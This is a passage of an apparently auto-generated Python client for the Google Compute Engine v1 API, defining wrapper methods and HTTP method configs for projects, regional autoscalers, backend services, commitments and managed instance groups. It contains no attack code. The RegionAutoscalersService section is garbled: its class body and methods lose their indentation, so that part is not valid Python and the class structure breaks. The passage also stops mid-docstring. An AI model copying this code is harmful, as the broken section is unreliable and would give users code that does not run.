        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.projects.get',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}',
        request_field='',
        request_type_name=u'ComputeProjectsGetRequest',
        response_type_name=u'Project',
        supports_download=False,
    )

    def GetXpnHost(self, request, global_params=None):
        """Get the shared VPC host project that this project links to. May be empty if no link exists.

        Args:
          request: (ComputeProjectsGetXpnHostRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Project) The response message.
        """
        config = self.GetMethodConfig('GetXpnHost')
        return self._RunMethod(
            config, request, global_params=global_params)

    GetXpnHost.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.projects.getXpnHost',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/getXpnHost',
        request_field='',
        request_type_name=u'ComputeProjectsGetXpnHostRequest',
        response_type_name=u'Project',
        supports_download=False,
    )

    def GetXpnResources(self, request, global_params=None):
        """Get service resources (a.k.a service project) associated with this host project.

        Args:
          request: (ComputeProjectsGetXpnResourcesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (ProjectsGetXpnResources) The response message.
        """
        config = self.GetMethodConfig('GetXpnResources')
        return self._RunMethod(
            config, request, global_params=global_params)

    # NOTE(review): this method uses u'order_by' (snake_case), unlike the
    # u'orderBy' used by other list methods. This appears to come straight
    # from the API discovery document for this endpoint — do not "fix" it
    # without checking the discovery doc.
    GetXpnResources.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.projects.getXpnResources',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
        relative_path=u'projects/{project}/getXpnResources',
        request_field='',
        request_type_name=u'ComputeProjectsGetXpnResourcesRequest',
        response_type_name=u'ProjectsGetXpnResources',
        supports_download=False,
    )

    def ListXpnHosts(self, request, global_params=None):
        """List all shared VPC host projects visible to the user in an organization.

        Args:
          request: (ComputeProjectsListXpnHostsRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (XpnHostList) The response message.
        """
        config = self.GetMethodConfig('ListXpnHosts')
        return self._RunMethod(
            config, request, global_params=global_params)

    # NOTE(review): also uses u'order_by' (snake_case) — see GetXpnResources.
    ListXpnHosts.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.listXpnHosts',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
        relative_path=u'projects/{project}/listXpnHosts',
        request_field=u'projectsListXpnHostsRequest',
        request_type_name=u'ComputeProjectsListXpnHostsRequest',
        response_type_name=u'XpnHostList',
        supports_download=False,
    )

    def MoveDisk(self, request, global_params=None):
        """Moves a persistent disk from one zone to another.

        Args:
          request: (ComputeProjectsMoveDiskRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('MoveDisk')
        return self._RunMethod(
            config, request, global_params=global_params)

    MoveDisk.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.moveDisk',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/moveDisk',
        request_field=u'diskMoveRequest',
        request_type_name=u'ComputeProjectsMoveDiskRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def MoveInstance(self, request, global_params=None):
        """Moves an instance and its attached persistent disks from one zone to another.

        Args:
          request: (ComputeProjectsMoveInstanceRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('MoveInstance')
        return self._RunMethod(
            config, request, global_params=global_params)

    MoveInstance.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.moveInstance',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/moveInstance',
        request_field=u'instanceMoveRequest',
        request_type_name=u'ComputeProjectsMoveInstanceRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetCommonInstanceMetadata(self, request, global_params=None):
        """Sets metadata common to all instances within the specified project using the data included in the request.

        Args:
          request: (ComputeProjectsSetCommonInstanceMetadataRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('SetCommonInstanceMetadata')
        return self._RunMethod(
            config, request, global_params=global_params)

    SetCommonInstanceMetadata.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.setCommonInstanceMetadata',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/setCommonInstanceMetadata',
        request_field=u'metadata',
        request_type_name=u'ComputeProjectsSetCommonInstanceMetadataRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetUsageExportBucket(self, request, global_params=None):
        """Enables the usage export feature and sets the usage export bucket where reports are stored.

        If you provide an empty request body using this method, the usage
        export feature will be disabled.

        Args:
          request: (ComputeProjectsSetUsageExportBucketRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('SetUsageExportBucket')
        return self._RunMethod(
            config, request, global_params=global_params)

    SetUsageExportBucket.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.setUsageExportBucket',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/setUsageExportBucket',
        request_field=u'usageExportLocation',
        request_type_name=u'ComputeProjectsSetUsageExportBucketRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class RegionAutoscalersService(base_api.BaseApiService):
"""Service class for the regionAutoscalers resource."""
_NAME = u'regionAutoscalers'
def __init__(self, client):
    """Initializes the service with the shared client; no upload configs."""
    super(ComputeV1.RegionAutoscalersService, self).__init__(client)
    # This service has no media-upload methods.
    self._upload_configs = {
    }
def Delete(self, request, global_params=None):
    """Deletes the specified autoscaler.

    Args:
      request: (ComputeRegionAutoscalersDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
Delete.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'DELETE',
    method_id=u'compute.regionAutoscalers.delete',
    ordered_params=[u'project', u'region', u'autoscaler'],
    path_params=[u'autoscaler', u'project', u'region'],
    query_params=[],
    relative_path=u'projects/{project}/regions/{region}/autoscalers/{autoscaler}',
    request_field='',
    request_type_name=u'ComputeRegionAutoscalersDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified autoscaler.
Args:
request: (ComputeRegionAutoscalersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Autoscaler) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionAutoscalers.get',
ordered_params=[u'project', u'region', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeRegionAutoscalersGetRequest',
response_type_name=u'Autoscaler',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeRegionAutoscalersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionAutoscalers.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscaler',
request_type_name=u'ComputeRegionAutoscalersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of autoscalers contained within the specified region.
Args:
request: (ComputeRegionAutoscalersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionAutoscalerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionAutoscalers.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field='',
request_type_name=u'ComputeRegionAutoscalersListRequest',
response_type_name=u'RegionAutoscalerList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeRegionAutoscalersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.regionAutoscalers.patch',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'autoscaler'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeRegionAutoscalersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeRegionAutoscalersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.regionAutoscalers.update',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'autoscaler'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeRegionAutoscalersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionBackendServicesService(base_api.BaseApiService):
    """Service class for the regionBackendServices resource.

    NOTE: auto-generated apitools service wrapper. Each public method is a
    thin runtime entry point; its wire-level description is attached as a
    lazily evaluated ``method_config`` lambda consumed by
    ``base_api.BaseApiService``. Do not edit by hand — regenerate from the
    API discovery document.
    """

    _NAME = u'regionBackendServices'

    def __init__(self, client):
        super(ComputeV1.RegionBackendServicesService, self).__init__(client)
        # No methods on this service support media upload.
        self._upload_configs = {
            }

    def Delete(self, request, global_params=None):
        """Deletes the specified regional BackendService resource.

        Args:
          request: (ComputeRegionBackendServicesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Delete')
        return self._RunMethod(
            config, request, global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.regionBackendServices.delete',
        ordered_params=[u'project', u'region', u'backendService'],
        path_params=[u'backendService', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
        request_field='',
        request_type_name=u'ComputeRegionBackendServicesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified regional BackendService resource.

        Args:
          request: (ComputeRegionBackendServicesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (BackendService) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionBackendServices.get',
        ordered_params=[u'project', u'region', u'backendService'],
        path_params=[u'backendService', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
        request_field='',
        request_type_name=u'ComputeRegionBackendServicesGetRequest',
        response_type_name=u'BackendService',
        supports_download=False,
    )

    def GetHealth(self, request, global_params=None):
        """Gets the most recent health check results for this regional BackendService.

        Args:
          request: (ComputeRegionBackendServicesGetHealthRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (BackendServiceGroupHealth) The response message.
        """
        config = self.GetMethodConfig('GetHealth')
        return self._RunMethod(
            config, request, global_params=global_params)

    # POST despite being a read: the group reference travels in the body.
    GetHealth.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionBackendServices.getHealth',
        ordered_params=[u'project', u'region', u'backendService'],
        path_params=[u'backendService', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}/getHealth',
        request_field=u'resourceGroupReference',
        request_type_name=u'ComputeRegionBackendServicesGetHealthRequest',
        response_type_name=u'BackendServiceGroupHealth',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a regional BackendService resource in the specified project using the data included in the request. There are several restrictions and guidelines to keep in mind when creating a regional backend service. Read Restrictions and Guidelines for more information.

        Args:
          request: (ComputeRegionBackendServicesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Insert')
        return self._RunMethod(
            config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionBackendServices.insert',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/backendServices',
        request_field=u'backendService',
        request_type_name=u'ComputeRegionBackendServicesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of regional BackendService resources available to the specified project in the given region.

        Args:
          request: (ComputeRegionBackendServicesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (BackendServiceList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionBackendServices.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        # Standard Compute list pagination/filtering query parameters.
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/backendServices',
        request_field='',
        request_type_name=u'ComputeRegionBackendServicesListRequest',
        response_type_name=u'BackendServiceList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
        """Updates the specified regional BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

        Args:
          request: (ComputeRegionBackendServicesPatchRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Patch')
        return self._RunMethod(
            config, request, global_params=global_params)

    Patch.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PATCH',
        method_id=u'compute.regionBackendServices.patch',
        ordered_params=[u'project', u'region', u'backendService'],
        path_params=[u'backendService', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
        request_field=u'backendServiceResource',
        request_type_name=u'ComputeRegionBackendServicesPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
        """Updates the specified regional BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information.

        Args:
          request: (ComputeRegionBackendServicesUpdateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Update')
        return self._RunMethod(
            config, request, global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PUT',
        method_id=u'compute.regionBackendServices.update',
        ordered_params=[u'project', u'region', u'backendService'],
        path_params=[u'backendService', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
        request_field=u'backendServiceResource',
        request_type_name=u'ComputeRegionBackendServicesUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class RegionCommitmentsService(base_api.BaseApiService):
    """Service class for the regionCommitments resource.

    NOTE: auto-generated apitools service wrapper. Each public method is a
    thin runtime entry point; its wire-level description is attached as a
    lazily evaluated ``method_config`` lambda consumed by
    ``base_api.BaseApiService``. Do not edit by hand — regenerate from the
    API discovery document.
    """

    _NAME = u'regionCommitments'

    def __init__(self, client):
        super(ComputeV1.RegionCommitmentsService, self).__init__(client)
        # No methods on this service support media upload.
        self._upload_configs = {
            }

    def AggregatedList(self, request, global_params=None):
        """Retrieves an aggregated list of commitments.

        Args:
          request: (ComputeRegionCommitmentsAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (CommitmentAggregatedList) The response message.
        """
        config = self.GetMethodConfig('AggregatedList')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Aggregated listing is project-scoped (no region path parameter).
    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionCommitments.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/commitments',
        request_field='',
        request_type_name=u'ComputeRegionCommitmentsAggregatedListRequest',
        response_type_name=u'CommitmentAggregatedList',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified commitment resource. Get a list of available commitments by making a list() request.

        Args:
          request: (ComputeRegionCommitmentsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Commitment) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionCommitments.get',
        ordered_params=[u'project', u'region', u'commitment'],
        path_params=[u'commitment', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/commitments/{commitment}',
        request_field='',
        request_type_name=u'ComputeRegionCommitmentsGetRequest',
        response_type_name=u'Commitment',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a commitment in the specified project using the data included in the request.

        Args:
          request: (ComputeRegionCommitmentsInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Insert')
        return self._RunMethod(
            config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionCommitments.insert',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/commitments',
        request_field=u'commitment',
        request_type_name=u'ComputeRegionCommitmentsInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of commitments contained within the specified region.

        Args:
          request: (ComputeRegionCommitmentsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (CommitmentList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionCommitments.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/commitments',
        request_field='',
        request_type_name=u'ComputeRegionCommitmentsListRequest',
        response_type_name=u'CommitmentList',
        supports_download=False,
    )
class RegionInstanceGroupManagersService(base_api.BaseApiService):
    """Service class for the regionInstanceGroupManagers resource.

    NOTE: auto-generated apitools service wrapper. Each public method is a
    thin runtime entry point; its wire-level description is attached as a
    lazily evaluated ``method_config`` lambda consumed by
    ``base_api.BaseApiService``. Do not edit by hand — regenerate from the
    API discovery document.
    """

    _NAME = u'regionInstanceGroupManagers'

    def __init__(self, client):
        super(ComputeV1.RegionInstanceGroupManagersService, self).__init__(client)
        # No methods on this service support media upload.
        self._upload_configs = {
            }

    def AbandonInstances(self, request, global_params=None):
        """Schedules a group action to remove the specified instances from the managed instance group. Abandoning an instance does not delete the instance, but it does remove the instance from any target pools that are applied by the managed instance group. This method reduces the targetSize of the managed instance group by the number of instances that you abandon. This operation is marked as DONE when the action is scheduled even if the instances have not yet been removed from the group. You must separately verify the status of the abandoning action with the listmanagedinstances method.

        If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

        You can specify a maximum of 1000 instances with this method per request.

        Args:
          request: (ComputeRegionInstanceGroupManagersAbandonInstancesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('AbandonInstances')
        return self._RunMethod(
            config, request, global_params=global_params)

    AbandonInstances.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroupManagers.abandonInstances',
        ordered_params=[u'project', u'region', u'instanceGroupManager'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/abandonInstances',
        request_field=u'regionInstanceGroupManagersAbandonInstancesRequest',
        request_type_name=u'ComputeRegionInstanceGroupManagersAbandonInstancesRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified managed instance group and all of the instances in that group.

        Args:
          request: (ComputeRegionInstanceGroupManagersDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Delete')
        return self._RunMethod(
            config, request, global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.regionInstanceGroupManagers.delete',
        ordered_params=[u'project', u'region', u'instanceGroupManager'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupManagersDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def DeleteInstances(self, request, global_params=None):
        """Schedules a group action to delete the specified instances in the managed instance group. The instances are also removed from any target pools of which they were a member. This method reduces the targetSize of the managed instance group by the number of instances that you delete. This operation is marked as DONE when the action is scheduled even if the instances are still being deleted. You must separately verify the status of the deleting action with the listmanagedinstances method.

        If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

        You can specify a maximum of 1000 instances with this method per request.

        Args:
          request: (ComputeRegionInstanceGroupManagersDeleteInstancesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('DeleteInstances')
        return self._RunMethod(
            config, request, global_params=global_params)

    DeleteInstances.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroupManagers.deleteInstances',
        ordered_params=[u'project', u'region', u'instanceGroupManager'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/deleteInstances',
        request_field=u'regionInstanceGroupManagersDeleteInstancesRequest',
        request_type_name=u'ComputeRegionInstanceGroupManagersDeleteInstancesRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns all of the details about the specified managed instance group.

        Args:
          request: (ComputeRegionInstanceGroupManagersGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (InstanceGroupManager) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionInstanceGroupManagers.get',
        ordered_params=[u'project', u'region', u'instanceGroupManager'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupManagersGetRequest',
        response_type_name=u'InstanceGroupManager',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a managed instance group using the information that you specify in the request. After the group is created, it schedules an action to create instances in the group using the specified instance template. This operation is marked as DONE when the group is created even if the instances in the group have not yet been created. You must separately verify the status of the individual instances with the listmanagedinstances method.

        A regional managed instance group can contain up to 2000 instances.

        Args:
          request: (ComputeRegionInstanceGroupManagersInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Insert')
        return self._RunMethod(
            config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroupManagers.insert',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers',
        request_field=u'instanceGroupManager',
        request_type_name=u'ComputeRegionInstanceGroupManagersInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of managed instance groups that are contained within the specified region.

        Args:
          request: (ComputeRegionInstanceGroupManagersListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (RegionInstanceGroupManagerList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionInstanceGroupManagers.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers',
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupManagersListRequest',
        response_type_name=u'RegionInstanceGroupManagerList',
        supports_download=False,
    )

    def ListManagedInstances(self, request, global_params=None):
        """Lists the instances in the managed instance group and instances that are scheduled to be created. The list includes any current actions that the group has scheduled for its instances.

        Args:
          request: (ComputeRegionInstanceGroupManagersListManagedInstancesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (RegionInstanceGroupManagersListInstancesResponse) The response message.
        """
        config = self.GetMethodConfig('ListManagedInstances')
        return self._RunMethod(
            config, request, global_params=global_params)

    ListManagedInstances.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroupManagers.listManagedInstances',
        ordered_params=[u'project', u'region', u'instanceGroupManager'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        # NOTE: u'order_by' (snake_case) is intentional — this one method's
        # discovery declaration differs from the camelCase u'orderBy' used by
        # the other list methods; presumably generated faithfully from the
        # upstream API. Do not "fix" without checking the discovery document.
        query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/listManagedInstances',
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupManagersListManagedInstancesRequest',
        response_type_name=u'RegionInstanceGroupManagersListInstancesResponse',
        supports_download=False,
    )

    def RecreateInstances(self, request, global_params=None):
        """Schedules a group action to recreate the specified instances in the managed instance group. The instances are deleted and recreated using the current instance template for the managed instance group. This operation is marked as DONE when the action is scheduled even if the instances have not yet been recreated. You must separately verify the status of the recreating action with the listmanagedinstances method.

        If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

        You can specify a maximum of 1000 instances with this method per request.

        Args:
          request: (ComputeRegionInstanceGroupManagersRecreateInstancesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('RecreateInstances')
        return self._RunMethod(
            config, request, global_params=global_params)

    RecreateInstances.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroupManagers.recreateInstances',
        ordered_params=[u'project', u'region', u'instanceGroupManager'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/recreateInstances',
        request_field=u'regionInstanceGroupManagersRecreateRequest',
        request_type_name=u'ComputeRegionInstanceGroupManagersRecreateInstancesRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Resize(self, request, global_params=None):
        """Changes the intended size for the managed instance group. If you increase the size, the group schedules actions to create new instances using the current instance template. If you decrease the size, the group schedules delete actions on one or more instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating or deleting actions with the listmanagedinstances method.

